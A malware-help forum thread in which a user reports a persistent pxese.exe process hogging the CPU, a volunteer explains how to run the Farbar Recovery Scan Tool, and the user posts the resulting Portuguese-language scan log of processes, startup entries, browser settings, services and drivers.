Program using 100% of my processor. Can't get rid of it!


  • This topic is locked
17 replies to this topic

#1 Hercilio


Posted 03 August 2017 - 10:48 AM

Hi

My name is Hercilio, I'm from Brazil, and it seems that I am having the same problem as the person in this topic (https://www.bleepingcomputer.com/forums/t/652955/windows-10exe-taking-up-100-processor-usage/). I tried to post it there, but it seems I don't have permission. Anyway, some program just started taking 100% of my processor usage: "pxese.exe wzglxt Microsoft 基础类应用程序". If I go to the file location, it takes me to "C:\Users\Hercilio\AppData\Roaming" and the file is there as "pxese.exe".

I tried to scan it with Windows Defender and IOBIT anti-malware with no success, tried to delete it and no success either, it just comes back.

I disabled it on start up and rebooted my PC and it seems to be not opening anymore but the file is still there.

Image of the file and the process on my computer. 
https://justpaste.it/19obe

Any help? (Sorry for any misspelled word, English is not my main language)


Edited by hamluis, 03 August 2017 - 11:12 AM.
Moved from MRL to Am I Infected - Hamluis.




#2 Aura


Posted 03 August 2017 - 11:48 AM

Hi Hercilio :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Farbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Download the right version of FRST for your system:
    • FRST 32-bit
    • FRST 64-bit
      Note: Only the right version will run on your system, the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using.
  • Move the executable (FRST.exe or FRST64.exe) to your Desktop;
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Make sure the Addition.txt box is checked;
  • Click on the Scan button;
  • On completion, two message boxes will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Hercilio


Posted 03 August 2017 - 01:40 PM

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 31-07-2017
Executado por Hercílio (administrador) em PC-NETINHO (03-08-2017 14:20:59)
Executando a partir de C:\Users\Hercílio\Desktop
Perfis Carregados: Hercílio (Perfis Disponíveis: Hercílio)
Platform: Windows 10 Home Single Language Versão 1703 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 11 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
 
==================== Processos (Whitelisted) =================
 
(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)
 
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(SuperBoost Software) C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\CNext\CCCSlim\MOM.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\CNext\CCCSlim\CCC.exe
(Dell Inc.) C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
() C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\audiobg.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\atiw.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
 
==================== Registro (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-07-14] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1483264 2017-07-14] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5793048 2014-10-08] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322712 2014-10-09] (Intel Corporation)
HKLM\...\Run: [TrueColor UI] => C:\Program Files\TrueColor\TrueColorUI.exe [19491792 2014-12-24] (Entertainment Experience)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-11-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [50343608 2016-09-29] (Hammer & Chisel, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5232928 2017-05-19] (IObit)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53130368 2016-05-17] (Skype Technologies S.A.)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [4338880 2016-02-02] (Disc Soft Ltd)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Discord] => C:\Users\Hercílio\AppData\Local\Discord\app-0.0.297\Discord.exe [64290304 2017-01-04] (Hammer & Chisel, Inc.)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [psexe] => C:\Users\Hercílio\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MountPoints2: {34d93e43-405d-11e7-82c4-f8a96363eab2} - "D:\setup.exe" 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MountPoints2: {c4accacd-5b5e-11e7-82c7-f8a96363eab2} - "E:\stp-tww.exe" 
HKU\S-1-5-18\...\Run: [psexe] => C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
GroupPolicy: Restrição <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
CHR HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
 
==================== Internet (Whitelisted) ====================
 
(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)
 
Hosts: 0.0.0.0 keystone.mwbsys.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{429515b6-e4de-4b9e-8e87-402facf1f602}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5904a231-e599-478b-a188-baa8c1e70b56}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{b4b36175-a2a3-4de1-ba12-05cfc1288d5b}: [DhcpNameServer] 8.8.4.4 8.8.8.8
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.br/
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCJB
SearchScopes: HKLM -> DefaultScope {13CA4886-6CB2-464C-889F-EB151E10E28B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {13CA4886-6CB2-464C-889F-EB151E10E28B} URL = 
SearchScopes: HKU\S-1-5-21-459013025-3067968454-1995941679-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2017-03-28] (IObit)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-05-25] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-05-25] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: 1yl2b5e1.default
FF ProfilePath: C:\Users\Hercílio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default [2017-08-03]
FF user.js: detected! => C:\Users\Hercílio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default\user.js [2017-07-14]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32.dll [2015-11-07] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-05-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-05-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default [2017-08-03]
CHR Extension: (Free Download Manager Chrome extension) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahmpjcflkgiildlgicmcieglgoilbfdp [2017-03-03]
CHR Extension: (Google Drive) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-01]
CHR Extension: (Documentos Google off-line) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (AdBlock) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-19]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-10]
CHR Extension: (Simple EPUB Reader) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojhbgcchcbdjdenibfmjofobklkkhofc [2016-11-14]
CHR Extension: (Gmail) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
CHR Extension: (Chrome Media Router) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-13]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]
 
==================== Serviços (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R2 AdvancedSystemCareService10; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [462624 2017-03-21] (IObit)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 DDVCollectorSvcApi; C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe [206712 2017-06-20] (Dell Inc.)
R2 DDVDataCollector; C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe [3296632 2017-06-20] (Dell Inc.)
R2 DDVRulesProcessor; C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe [217464 2017-06-20] (Dell Inc.)
S4 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [137968 2015-09-22] (Dell Inc.)
S4 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [153960 2016-04-29] (Dell)
S4 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [278568 2014-10-31] (Aviata, Inc.)
S4 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
S3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [1439424 2016-02-02] (Disc Soft Ltd)
S2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [389632 2016-01-10] (Scarlet.Crush Productions) [Arquivo não assinado]
S4 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [8704 2015-09-02] (Hi-Rez Studios) [Arquivo não assinado]
S4 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18584 2014-10-09] (Intel Corporation)
S4 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382448 2017-02-24] (Intel Corporation)
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [1766176 2017-05-19] (IObit)
S4 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [630048 2016-10-13] (Intel® Corporation)
S4 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel)
R2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2017-03-28] (IObit)
S4 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [177440 2016-12-05] (Intel Corporation)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [320512 2017-07-14] (Realtek Semiconductor)
R2 sgbupt; C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe [2600256 2016-10-21] (SuperBoost Software)
R2 SupportAssistAgent; C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [52696 2017-06-28] (Dell Inc.)
S4 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [263264 2017-02-16] (Synaptics Incorporated)
S4 TrueColorALS; C:\Program Files\TrueColor\TrueColorALS.exe [94160 2014-12-24] ()
S4 updater; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [464384 2016-01-10] (Nefarius Software Solutions) [Arquivo não assinado]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.3.227\WsAppService.exe [492768 2017-06-21] (Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
 
===================== Drivers (Whitelisted) ======================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R2 atksgt; C:\WINDOWS\System32\DRIVERS\atksgt.sys [312480 2015-06-11] ()
R3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32960 2017-04-11] (Dell Inc.)
R3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [32568 2017-04-11] (Dell Computer Corporation)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [22864 2017-07-14] (OSR Open Systems Resources, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [129152 2016-04-24] (Samsung Electronics Co., Ltd.)
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [30264 2017-05-27] (Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [47672 2017-07-13] (Disc Soft Ltd)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-14] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-07-14] (REALiX™)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2017-07-14] (Intel Corporation)
S3 iaLPSS_SPI; C:\WINDOWS\System32\drivers\iaLPSS_SPI.sys [100856 2014-06-10] (Intel Corporation)
S3 iaLPSS_UART2; C:\WINDOWS\System32\drivers\iaLPSS_UART2.sys [143864 2014-06-10] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [252936 2017-07-14] (Intel Corporation)
R1 IMFCameraProtect; C:\WINDOWS\system32\drivers\IMFCameraProtect.sys [44096 2017-03-17] (IObit.com)
R3 IMFDownProtect; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\IMFDownProtect.sys [39288 2017-03-06] (IObit.com)
S4 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\IMFFilter.sys [40440 2017-02-16] (IObit)
R3 IMFForceDelete; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\IMFForceDelete.sys [33600 2017-02-16] (IObit.com)
S3 libusbK; C:\WINDOWS\System32\drivers\libusbK.sys [47200 2017-05-09] (hxxp://libusb-win32.sourceforge.net)
R2 lirsgt; C:\WINDOWS\System32\DRIVERS\lirsgt.sys [43168 2015-06-11] ()
S3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-06-15] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-06-14] (Malwarebytes)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [82072 2015-09-23] (McAfee, Inc.)
R1 MpKsl52b32a65; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{F00C73F1-9FED-4738-9E66-E74325D7BA49}\MpKsl52b32a65.sys [44928 2017-08-03] (Microsoft Corporation)
R3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw04.sys [3499776 2017-07-14] (Intel Corporation)
S3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; c:\program files\dell\supportassist\pcdsrvc_x64.pkms [25584 2017-05-26] (PC-Doctor, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\regfilter.sys [52792 2017-02-16] (IObit.com)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [984032 2017-07-14] (Realtek                                            )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [419296 2017-07-14] (Realsil Semiconductor Corporation)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [30744 2017-03-09] (IObit)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [221824 2016-04-24] (Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [66136 2017-02-16] (Synaptics Incorporated)
R3 usb3Hub; C:\WINDOWS\System32\drivers\usb3Hub.sys [213296 2014-10-15] (Windows ® Win 7 DDK provider)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
